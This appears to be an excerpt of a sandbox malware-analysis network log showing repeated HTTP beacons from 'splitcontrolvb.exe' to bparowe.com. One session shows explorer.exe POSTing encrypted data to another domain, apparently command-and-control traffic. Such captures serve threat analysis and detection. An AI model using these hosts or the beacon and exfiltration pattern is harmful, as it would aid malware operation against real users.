                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                263192.168.2.459494185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:27.972837925 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:28.251765013 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:28 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                264192.168.2.459495185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:28.685064077 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:28.959059000 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:28 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                265192.168.2.459496185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:29.597032070 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:29.878627062 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                266192.168.2.459497185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:31.822348118 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:32.101285934 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:31 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                267192.168.2.459498185.196.8.2280
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:32.522068024 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:32.804800034 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:32 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                268192.168.2.459499185.196.8.2280
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:33.202939987 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:33.481304884 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:33 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                269192.168.2.459500185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:33.877429962 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:34.159090042 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:34 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                270192.168.2.459501185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:34.653542995 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:34.927098036 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:34 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                271192.168.2.459502185.196.8.2280
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:35.360716105 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:35.638564110 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:35 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                272192.168.2.45950391.215.85.17802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:35.650538921 CET281OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://boeospllpymdlg.com/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:35.650569916 CET109OUTData Raw: 48 9d 8e cc 3b 67 52 24 2a 0a 26 27 7e ac 56 cb 5e 66 e8 16 fd 6a d7 aa c6 6c a0 86 76 f7 a7 96 fb ad fb c4 03 46 ee b1 a7 5e 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                                Data Ascii: H;gR$*&'~V^fjlvF^j~_=;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:35.938576937 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:35 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                273192.168.2.459504185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:36.096292973 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:36.380625963 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:36 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                274192.168.2.459505185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:36.805123091 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:37.079694033 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:36 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                275192.168.2.459506185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:37.499228001 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:37.777427912 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:37 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                276192.168.2.459507185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:38.199712992 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:38.479547977 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:38 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                277192.168.2.459508185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:38.905977964 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:39.185075045 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:39 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                278192.168.2.459509185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:39.588051081 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:39.861453056 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:39 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                279192.168.2.459510185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:40.289206028 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:40.570777893 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:40 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                280192.168.2.459511185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:41.039994955 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
